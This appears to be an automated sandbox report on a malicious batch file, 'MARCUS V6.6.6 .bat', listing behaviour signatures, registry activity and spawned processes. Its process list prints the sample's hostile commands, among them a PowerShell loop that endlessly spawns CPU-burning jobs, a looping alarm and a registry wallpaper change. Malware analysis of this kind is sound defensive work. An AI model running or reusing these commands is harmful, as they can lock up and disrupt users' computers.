Analysis Overview
Threat Level: Known bad
The file https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
Sets desktop wallpaper using registry
Drops file in Windows directory
Command and Scripting Interpreter: PowerShell
System Network Configuration Discovery: Internet Connection Discovery
Browser Information Discovery
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Uses Volume Shadow Copy service COM API
Checks SCSI registry key(s)
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-02 10:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-02 10:53
Reported
2025-05-02 10:56
Platform
win10v2004-20250314-en
Max time kernel
154s
Max time network
140s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3800 created 4436 | N/A | C:\Windows\system32\taskmgr.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
| PID 3800 created 4436 | N/A | C:\Windows\system32\taskmgr.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | C:\Windows\system32\reg.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\wermgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568095642924" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{ABFFE479-7355-4D5A-8373-56353A111EB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2a0,0x2d0,0x2c8,0x2d8,0x7fff2494f208,0x7fff2494f214,0x7fff2494f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=6088,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6912,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7244,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4268,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7352,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7120,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7416,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7568,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7196,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7176,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=4232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8120 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4276,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7728,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8240 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
